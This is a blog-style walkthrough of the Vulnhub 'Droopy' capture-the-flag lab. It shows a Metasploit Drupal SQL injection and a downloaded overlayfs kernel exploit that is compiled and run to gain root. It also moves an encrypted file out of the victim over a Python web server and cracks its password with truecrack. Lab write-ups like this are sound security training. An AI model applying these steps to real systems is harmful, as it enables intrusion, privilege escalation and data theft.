Vulnhub’s Droopy: A Walkthrough
Hello and welcome to another one of my blog entries.
Today, we will be attempting to compile a walkthrough on the ‘Droopy CTF’, machine, available on Vulnhub.
The credits for the creation of this box go to knightmare and I honestly enjoyed pwning this box.
You can download the box from here-https://www.vulnhub.com/entry/droopy-v02,143/
RECONNAISSANCE
So let’s start off, by discovering the IP, using the netdiscover command.
Our target IP=192.168.43.55
Running a full port stealth scan over the target, we get the following scan summary
We first head off to port 80, where we find this website
Wow, a brute-forcing opportunity.
5 minutes later, not everything was cheery. I had been blocked out, from attempting any logins. I also discovered that the username ‘admin’ exists in the users list.
We observe that the website is powered by Drupal CMS.
ENUMERATION
Attempting dirbuster scans, we find the following list of internal webpages
We first targeted robots.txt, from the web directory
From the /CHANGELOG.txt file, we gain recon, that the Drupal CMS version is 7.3 .0. This info comes handy later
Other entries from the robots.txt file were irrelevant or lacked necessary information.
GAINING ACCESS
How to gain access?
I am locked out of the CMS, so no way of uploading a shell.
Metasploit and searchsploit seem to be the other alternatives.
We search for exploits on searchsploit, specific to Drupal v7.3
SQL Injection done manually would be impossible right now, in our case, There is a chance of an exploit existing for the same, on Metasploit.
Powering up Metasploit
There does exist an exploit! Great!
Using the exploit, we set up the options
Hitting ‘exploit’,we get a meterpreter prompt.
Type in ‘shell’ and we get www-data’s shell prompt.
LEVERAGING PRIVILEGES
We made our way to /var/tmp/html and looked around for hidden or possible Drupal/SQL configuration files.No dice.
Attempts to find writable files, were in vain too.
We did however find a possible user ‘gssuser’,in /home.No interesting files there.
When running over /var/mail, we find a mail addressed to us(www-data)
Hmm..A password, with less than 12 characters, something related to an ‘academy’ and rockyou-must be referring to the 20 million long-wordlist
We are no closer to rooting the machine
When all hopes are down, a hacker can always resort to a machine exploit
By performing the command ‘uname -a’,it is determined that the make of the machine is 3.13.0.-43 generic #72 Ubuntu SMP
A quick search on Google, gives us a suitable exploit, for the same. The ‘overlayfs’ exploit, from Exploit-DB.Always a handy resource.
Steps for exploitation:-
- Download it on the victim machine,using wget utility.
NOTE:It is always wise to download exploits,when you are in /tmp.
Command -wget https://www.exploit-db.com/download/372922)Compile the downloaded exploit(37292.c)
Command-mv 37292 37292.cCommand-gcc 37292.c -o exploit -pthread
‘ls’ and you will find a file named ‘exploit’
3)Run the exploit
chmod it to 700 and run it (./exploit)
You become root, but don’t find any flags in /root
We did however find a file named ‘dave.tc’.This was puzzling.
With knowledge from other walkthroughs, it is supposedly a ‘truecrypt’ extension file,with some encrypted content inside.
For analysis, we need to transfer the file into our attacker machine, which we do, using the ‘pythonserver’ utility.
Steps:-
1)Move the dave.tc file to /tmp (victim’s machine)
2)Start the python server, from the victim machine
Command-python -m http.server 80003)From our attacker machine, wget the file
Command-wget http://192.168.43.55/dave.tcNow, getting to analyze the file
Hints:-
- The password is less than 12 characters
- Has something to do with an academy and a song ,by the Jam
- Can possibly be cracked/generated from the rockyou.txt file
When going through their songs,we have one named “The Eton Rifles”.So we take it as a guess and pullout all strings from rockyou.txt,having words starting, ending or having a substring of the word ‘eton’.These are compiled into a wordlist file named ‘Eton.txt’
Command- grep ^“eton” rockyou.txt>>Eton.txtCommand-grep “eton” rockyou.txt>>Eton.txtCommand-grep “eton”$ rockyou.txt>>Eton.txt
We get a total of 663 passwords
Before cracking ,we need to install truecrack first
Command-apt install truecrackNow this is where it gets interesting. Crack time!
Command-truecrack — truecrypt dave.tc — wordlist Eton.txt — verboseWe did’nt find the password on first crack attempt
Why? Because truecrypt used key derivation RIPEMD-160 as default
Now we change it to use sha512
Command-truecrack — truecrypt dave.tc — wordlist Eton.txt -key sha512 — verboseOn the 54'th password, truecrack truly cracks it.
Password-etonacademy
To open the file,we need to mount it first, we use cryptsetup
Commands-cryptstup open — type tcrypt dave.tc dave
mkdir -p /mnt/davemount /dev/mapper/dave /mnt/davecd /mnt/dave
We find 3 directories in plain sight and 1 hidden.
Opening /buller, we find an image called BullingdonCrest.jpg
Opening /panama,we find a file named shares.jpg
Opening /lost+found- Empty
Opening hidden directory .secret,
We find another directory called .top
Opening it, we get a file named flag.txt
REPORTING
Well, you have it now!
Conclusion:-
Well, it’s a different type of box, where root flag capture was not done the conventional way. I got to research and find a new encryption tool, which is pretty much secure.
Also, it is a good box for beginners to get their hands dirty with. Some guidance needs to be provided during the file mount and decryption phase.
Thanks for making it here. Until then, I am off to pwn a few boxes out there..
